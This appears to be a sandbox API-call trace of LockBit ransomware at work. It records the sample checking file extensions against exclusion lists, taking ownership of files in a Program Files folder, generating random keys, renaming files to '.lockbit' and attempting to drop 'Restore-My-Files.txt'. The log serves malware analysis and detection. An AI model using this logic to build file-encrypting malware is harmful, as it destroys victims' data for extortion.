lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0083.474] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Notes_LOOP_BG_PAL.wmv") returned 1 [0083.474] lstrcmpiW (lpString1="ntldr", lpString2="Notes_LOOP_BG_PAL.wmv") returned 1 [0083.474] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Notes_LOOP_BG_PAL.wmv") returned 1 [0083.474] lstrcmpiW (lpString1="bootsect.bak", lpString2="Notes_LOOP_BG_PAL.wmv") returned -1 [0083.474] lstrcmpiW (lpString1="autorun.inf", lpString2="Notes_LOOP_BG_PAL.wmv") returned -1 [0083.475] lstrcmpiW (lpString1="thumbs.db", lpString2="Notes_LOOP_BG_PAL.wmv") returned 1 [0083.475] lstrcmpiW (lpString1="iconcache.db", lpString2="Notes_LOOP_BG_PAL.wmv") returned -1 [0083.475] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0083.475] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv") returned=".wmv" [0083.475] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0083.475] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0083.475] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0083.476] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0083.476] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv.lockbit") returned 79 [0083.476] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.477] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.477] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.477] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.477] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.478] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.478] RtlFreeAnsiString (AnsiString="\\") [0083.478] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.478] malloc (_Size=0x200) returned 0x77d800 [0083.478] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.478] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.478] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.478] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.479] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.479] CloseHandle (hObject=0x3b8) returned 1 [0083.479] free (_Block=0x77d800) [0083.479] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\notes_loop_bg_pal.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.479] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.479] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.479] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=869322) returned 1 [0083.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.480] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.480] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.480] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.481] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.481] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.481] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0083.488] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.488] malloc (_Size=0xb4) returned 0x1ff1e60 [0083.488] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0083.497] free (_Block=0x1ff1e60) [0083.498] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Notes_LOOP_BG_PAL.wmv" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0083.498] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0083.498] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.498] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7240848c, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7240848c, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e66a45b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xbc8, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_btn-back-over-select.png", cAlternateFileName="")) returned 1 [0083.498] lstrcmpiW (lpString1=".", lpString2="Pets_btn-back-over-select.png") returned -1 [0083.498] lstrcmpiW (lpString1="..", lpString2="Pets_btn-back-over-select.png") returned -1 [0083.498] PathFindExtensionW (pszPath="Pets_btn-back-over-select.png") returned=".png" [0083.498] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0083.498] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0083.498] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0083.499] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0083.499] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0083.499] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0083.499] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0083.499] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0083.499] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0083.499] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0083.499] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0083.500] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0083.500] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0083.500] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0083.500] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_btn-back-over-select.png") returned 1 [0083.500] lstrcmpiW (lpString1="ntldr", lpString2="Pets_btn-back-over-select.png") returned -1 [0083.500] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_btn-back-over-select.png") returned -1 [0083.500] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_btn-back-over-select.png") returned -1 [0083.500] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_btn-back-over-select.png") returned -1 [0083.500] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_btn-back-over-select.png") returned 1 [0083.500] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_btn-back-over-select.png") returned -1 [0083.500] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0083.500] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png") returned=".png" [0083.500] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0083.500] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0083.500] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0083.501] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0083.501] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0083.501] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0083.501] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0083.501] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0083.501] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0083.501] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0083.501] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0083.502] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png.lockbit") returned 87 [0083.502] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.503] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0083.503] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0083.503] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0083.504] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0083.504] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0083.504] RtlFreeAnsiString (AnsiString="\\") [0083.504] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3b8) returned 0x0 [0083.504] malloc (_Size=0x200) returned 0x77d800 [0083.504] NtQueryInformationToken (in: TokenHandle=0x3b8, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0083.504] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.504] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0083.504] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.505] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0083.505] CloseHandle (hObject=0x3b8) returned 1 [0083.505] free (_Block=0x77d800) [0083.505] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\pets_btn-back-over-select.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0083.505] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0083.505] malloc (_Size=0x40068) returned 0x1fb18c0 [0083.505] GetFileSizeEx (in: hFile=0x3b8, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3016) returned 1 [0083.505] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.506] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.506] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0083.506] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0083.507] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0083.507] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0083.507] ReadFile (in: hFile=0x3b8, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 0x0 [0083.516] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0083.516] malloc (_Size=0xc4) returned 0x1ff1e60 [0083.516] NtSetInformationFile (FileHandle=0x3b8, IoStatusBlock=0x3d6aa8c, FileInformation=0x1ff1e60, Length=0xc4, FileInformationClass=0xa) returned 0xc0000008 [0083.517] free (_Block=0x1ff1e60) [0083.517] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Pets_btn-back-over-select.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets") returned 1 [0083.517] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt") returned 70 [0083.517] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\pets\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0083.517] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7242e5e9, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x7242e5e9, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4e66a45b, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x739, dwReserved0=0x0, dwReserved1=0x0, cFileName="Pets_btn-back-static.png", cAlternateFileName="")) returned 1 [0083.517] lstrcmpiW (lpString1=".", lpString2="Pets_btn-back-static.png") returned -1 [0083.517] lstrcmpiW (lpString1="..", lpString2="Pets_btn-back-static.png") returned -1 [0083.517] PathFindExtensionW (pszPath="Pets_btn-back-static.png") returned=".png" [0083.517] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0083.517] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0083.517] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0083.517] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0083.517] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0083.517] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0083.517] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0083.517] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0083.517] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0083.518] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0083.518] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0083.518] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0083.518] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0083.518] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0083.518] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0083.518] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0083.519] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0083.519] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0083.519] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0083.519] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0083.519] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Pets_btn-back-static.png") returned 1 [0083.519] lstrcmpiW (lpString1="ntldr", lpString2="Pets_btn-back-static.png") returned -1 [0083.519] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Pets_btn-back-static.png") returned -1 [0083.519] lstrcmpiW (lpString1="bootsect.bak", lpString2="Pets_btn-back-static.png") returned -1 [0083.519] lstrcmpiW (lpString1="autorun.inf", lpString2="Pets_btn-back-static.png") returned -1 [0083.519] lstrcmpiW (lpString1="thumbs.db", lpString2="Pets_btn-back-static.png") returned 1 [0083.519] lstrcmpiW (lpString1="iconcache.db", lpString2="Pets_btn-back-static.png") returned -1 [0083.519] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Pets\\") returned="" [0083.519] 